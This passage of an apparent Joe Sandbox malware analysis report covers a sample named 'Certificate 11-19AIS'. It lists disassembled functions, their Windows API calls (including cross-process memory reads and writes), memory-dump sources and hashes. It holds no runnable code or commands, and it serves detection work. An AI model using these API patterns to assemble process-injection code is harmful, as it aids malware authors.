                                                                              • Opcode ID: 0ec8c690acddd89e65e47227163328ebb0e278e1a8446f997e8504a60c10ac13
                                                                              • Instruction ID: 2ad4ad6e128d28d077faa5768929279baafed1b351e9446e9a8243d3c5cc3a9b
                                                                              • Opcode Fuzzy Hash: 0ec8c690acddd89e65e47227163328ebb0e278e1a8446f997e8504a60c10ac13
                                                                              • Instruction Fuzzy Hash: 85216275A00204EFD710DFA4DD49AAEB7E5FF88301F148879E959D7252DB74AD40CBA0
                                                                              Function 007CAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 007CAFE3
                                                                              • SelectObject.GDI32(?,00000000), ref: 007CAFF2
                                                                              • BeginPath.GDI32(?), ref: 007CB009
                                                                              • SelectObject.GDI32(?,00000000), ref: 007CB033
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                              • String ID:
                                                                              • API String ID: 3225163088-0
                                                                              • Opcode ID: 6142f965b26674b7dfb6d68e6098694ada8f30c7c0396a563d445e6b0b7bd517
                                                                              • Instruction ID: 9d9b0211bbaab64072db0cf926fed3397ecda81f421014c65a4563301a2eb0ac
                                                                              • Opcode Fuzzy Hash: 6142f965b26674b7dfb6d68e6098694ada8f30c7c0396a563d445e6b0b7bd517
                                                                              • Instruction Fuzzy Hash: BF217FB0800309EFDF10DF69EC4DB9A7B68BB60356F14421EF429961B4D37488D9DB91
                                                                              Function 007D217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __calloc_crt.LIBCMT ref: 007D21A9
                                                                              • CreateThread.KERNEL32(?,?,007D22DF,00000000,?,?), ref: 007D21ED
                                                                              • GetLastError.KERNEL32 ref: 007D21F7
                                                                              • _free.LIBCMT ref: 007D2200
                                                                              • __dosmaperr.LIBCMT ref: 007D220B
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                              • String ID:
                                                                              • API String ID: 2664167353-0
                                                                              • Opcode ID: af0b94cc47bdb0963e26a7e6b0f3eb7505e46e8e755e366dbb28679af47b549f
                                                                              • Instruction ID: 1f5d05f269fd8319c24147ddbd19705c58cda80ab9fed8b53dfaa0e60029255f
                                                                              • Opcode Fuzzy Hash: af0b94cc47bdb0963e26a7e6b0f3eb7505e46e8e755e366dbb28679af47b549f
                                                                              • Instruction Fuzzy Hash: 6611E533204306AF9B15AF65DC45D9B37B8FF50760710442BF91486342FB39981386B0
                                                                              Function 007EABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007EABD7
                                                                              • GetLastError.KERNEL32(?,007EA69F,?,?,?), ref: 007EABE1
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,007EA69F,?,?,?), ref: 007EABF0
                                                                              • HeapAlloc.KERNEL32(00000000,?,007EA69F,?,?,?), ref: 007EABF7
                                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007EAC0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 842720411-0
                                                                              • Opcode ID: e2e13155928b440a6374b1a78b68bb68c2fbb3187d22858faee50deaa5f75e09
                                                                              • Instruction ID: 2629b3b087bd0eeaa64da702ce845557073afa0a3593bab8bac230ef89700cdc
                                                                              • Opcode Fuzzy Hash: e2e13155928b440a6374b1a78b68bb68c2fbb3187d22858faee50deaa5f75e09
                                                                              • Instruction Fuzzy Hash: E1016970201244BFDB114FAAEC48DAB3BBCFF8A3547200829F905C3260DA759C40CBB0
                                                                              Function 007F7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7A74
                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007F7A82
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007F7A8A
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007F7A94
                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              • Opcode ID: 6e951797dc7b430913efc531719d963e1150a8f00821e9713d4fa693930d4cc8
                                                                              • Instruction ID: 923054d153b058fa232762fe1fe412ea30f7b73151a655921cd0a8f1cc53a5a4
                                                                              • Opcode Fuzzy Hash: 6e951797dc7b430913efc531719d963e1150a8f00821e9713d4fa693930d4cc8
                                                                              • Instruction Fuzzy Hash: C6012D31C0462DDBCF04AFE8EC899EDBB78FB48711F024455E602B2250DB349650C7A1
                                                                              Function 007E9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CLSIDFromProgID.OLE32 ref: 007E9ADC
                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 007E9AF7
                                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 007E9B05
                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 007E9B15
                                                                              • CLSIDFromString.OLE32(?,?), ref: 007E9B21
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 3897988419-0
                                                                              • Opcode ID: b957bfadf0012f7abdfaea007065d89b35e877417489830936eb0496df07a0c4
                                                                              • Instruction ID: eba47e785c49fa4176f76bfbbfe1304f7a835cbc169c4a32bfe778d3d3feb371
                                                                              • Opcode Fuzzy Hash: b957bfadf0012f7abdfaea007065d89b35e877417489830936eb0496df07a0c4
                                                                              • Instruction Fuzzy Hash: 86018FB6611204FFDB104F66EC44B9A7AEDEF88351F148C34FA05D2210D778DD009BA0
                                                                              Function 007EAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007EAA79
                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007EAA83
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007EAA92
                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007EAA99
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007EAAAF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: 2bdb9d97d63a980d344e8e63d908d5eed34277b2f31a4f7e413311b4a3002b53
                                                                              • Instruction ID: f41677bd4d4dab008a84117e649255aff35b253d72057e5e8c528b2a85ca4302
                                                                              • Opcode Fuzzy Hash: 2bdb9d97d63a980d344e8e63d908d5eed34277b2f31a4f7e413311b4a3002b53
                                                                              • Instruction Fuzzy Hash: EBF04F712013047FEB115FA5AC89EAB7BACFF89754F004829F941C7190DA64EC51DA61
                                                                              Function 007EAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007EAADA
                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007EAAE4
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007EAAF3
                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007EAAFA
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007EAB10
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: 6b2b4082199fe0170ef718f2bdc54cccd8b0aeec126f06c55a7c910c8d67acc8
                                                                              • Instruction ID: c56a9ad9517f7ad1f50c8dabc51d051ea88ccc8c48429b86948bc4a1f337ccc7
                                                                              • Opcode Fuzzy Hash: 6b2b4082199fe0170ef718f2bdc54cccd8b0aeec126f06c55a7c910c8d67acc8
                                                                              • Instruction Fuzzy Hash: D8F04F712013087FEB111FA5FC88EAB3B6EFF99754F000829F941C7190DA64EC119A61
                                                                              Function 007EEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 007EEC94
                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 007EECAB
                                                                              • MessageBeep.USER32(00000000), ref: 007EECC3
                                                                              • KillTimer.USER32(?,0000040A), ref: 007EECDF
                                                                              • EndDialog.USER32(?,00000001), ref: 007EECF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 3741023627-0
                                                                              • Opcode ID: 33fe2bddaa06c5fb8b3b015714936c200ee0762ede5691b9d9e8e616e14ea774
                                                                              • Instruction ID: 33a918c6c710364d4c1048c0fc25d0f6f37cdced6b6f3213d9cfa68b74a0c849
                                                                              • Opcode Fuzzy Hash: 33fe2bddaa06c5fb8b3b015714936c200ee0762ede5691b9d9e8e616e14ea774
                                                                              • Instruction Fuzzy Hash: AF018130500744EBEB245B21EE5EB9677B8FB54705F100D59B693A14F0EBF8AA94CB90
                                                                              Function 007CB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EndPath.GDI32(?), ref: 007CB0BA
                                                                              • StrokeAndFillPath.GDI32(?,?,0082E680,00000000,?,?,?), ref: 007CB0D6
                                                                              • SelectObject.GDI32(?,00000000), ref: 007CB0E9
                                                                              • DeleteObject.GDI32 ref: 007CB0FC
                                                                              • StrokePath.GDI32(?), ref: 007CB117
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: d36855f93941eb12645a2a5bbe5557ac5ab0dc3fe5cafc4b21ace521ea626274
                                                                              • Instruction ID: ce603fab6faac896372cb1fd29a829a1281d74cf2c373c00ff0c601d25f5e602
                                                                              • Opcode Fuzzy Hash: d36855f93941eb12645a2a5bbe5557ac5ab0dc3fe5cafc4b21ace521ea626274
                                                                              • Instruction Fuzzy Hash: F6F01430004608EFCF25AF69EC0EB983B64BB60762F088318F469894F4C734C9AADF50
                                                                              Function 007FF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 007FF2DA
                                                                              • CoCreateInstance.OLE32(0083DA7C,00000000,00000001,0083D8EC,?), ref: 007FF2F2
                                                                              • CoUninitialize.OLE32 ref: 007FF555
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize
                                                                              • String ID: .lnk
                                                                              • API String ID: 948891078-24824748
                                                                              • Opcode ID: 6bf5078b61e59ff57d9fe26392117a45639f78fee55158690fac5b5e1773103f
                                                                              • Instruction ID: cdf5baed826f56b6ac851037882856b406c776d5e0bd38f3d8ad215221d6b9ef
                                                                              • Opcode Fuzzy Hash: 6bf5078b61e59ff57d9fe26392117a45639f78fee55158690fac5b5e1773103f
                                                                              • Instruction Fuzzy Hash: B1A13AB1104201AFD301EF64C885EAFB7E8EF98714F00495DF65597292EB74EA09CBA2
                                                                              Function 007FE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B53B1,?,?,007B61FF,?,00000000,00000001,00000000), ref: 007B662F
                                                                              • CoInitialize.OLE32(00000000), ref: 007FE85D
                                                                              • CoCreateInstance.OLE32(0083DA7C,00000000,00000001,0083D8EC,?), ref: 007FE876
                                                                              • CoUninitialize.OLE32 ref: 007FE893
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                              • String ID: .lnk
                                                                              • API String ID: 2126378814-24824748
                                                                              • Opcode ID: ab5f8fb9ad3422b070d3ab6d9f4775710e29ae60c101918550de1570a472005f
                                                                              • Instruction ID: 3432243e735cc4da795c582fa67433e258c7d7f78ee1dfeec0537d8369211a46
                                                                              • Opcode Fuzzy Hash: ab5f8fb9ad3422b070d3ab6d9f4775710e29ae60c101918550de1570a472005f
                                                                              • Instruction Fuzzy Hash: 3DA13575604305DFCB10DF14C888A6ABBE5FF88310F058958FAA69B3A1CB35EC45CB92
                                                                              Function 007D325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 007D32ED
                                                                                • Part of subcall function 007DE0D0: __87except.LIBCMT ref: 007DE10B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__87except__start
                                                                              • String ID: pow
                                                                              • API String ID: 2905807303-2276729525
                                                                              • Opcode ID: 6122f985ada96c9e22a8031c7362f448e07624fd0b8a305670583248b996e136
                                                                              • Instruction ID: e104a634e3b0f2285e6ceffe8f6ca6f34e90a61d32043d462ec459e001dbb651
                                                                              • Opcode Fuzzy Hash: 6122f985ada96c9e22a8031c7362f448e07624fd0b8a305670583248b996e136
                                                                              • Instruction Fuzzy Hash: AC515521A08205D6CB167714CA0577E7BB4BB41720F648D2BF4C58A3A9EE3D9EC4DA43
                                                                              Function 007F4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0084DC50,?,0000000F,0000000C,00000016,0084DC50,?), ref: 007F4645
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 007F46C5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                                              • String ID: REMOVE$THIS
                                                                              • API String ID: 3797816924-776492005
                                                                              • Opcode ID: 5ac8902aa59ebe425837c549527d4f9a4d9ef4e5d27ce26ba41146c7f57b57ea
                                                                              • Instruction ID: 2f9cb19f86e3ff60518304d96a3f3261e086be7a89cd01dce4ced16ef7a36812
                                                                              • Opcode Fuzzy Hash: 5ac8902aa59ebe425837c549527d4f9a4d9ef4e5d27ce26ba41146c7f57b57ea
                                                                              • Instruction Fuzzy Hash: B0414E74A00219DFCF01EF94C885ABEB7B5FF45314F148459EA16AB351D7389D45CB60
                                                                              Function 007EC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007F430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007EBC08,?,?,00000034,00000800,?,00000034), ref: 007F4335
                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007EC1D3
                                                                                • Part of subcall function 007F42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007EBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 007F4300
                                                                                • Part of subcall function 007F422F: GetWindowThreadProcessId.USER32(?,?), ref: 007F425A
                                                                                • Part of subcall function 007F422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007EBBCC,00000034,?,?,00001004,00000000,00000000), ref: 007F426A
                                                                                • Part of subcall function 007F422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007EBBCC,00000034,?,?,00001004,00000000,00000000), ref: 007F4280
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007EC240
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007EC28D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                              • String ID: @
                                                                              • API String ID: 4150878124-2766056989
                                                                              • Opcode ID: 4ab1b638e0e1423b1b9701392271a2fbfa52afc2f46e3849463806b3fc4b3cab
                                                                              • Instruction ID: f60fca4fe817be51c6ce754badf08515c0f55f6538866f978a409978d54b0873
                                                                              • Opcode Fuzzy Hash: 4ab1b638e0e1423b1b9701392271a2fbfa52afc2f46e3849463806b3fc4b3cab
                                                                              • Instruction Fuzzy Hash: D4414B7690121CAFDB11DFA4CC86EEEB7B8BF09300F004095FA55B7281DA75AE45CBA1
                                                                              Function 0081A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                              Download Yara Rule
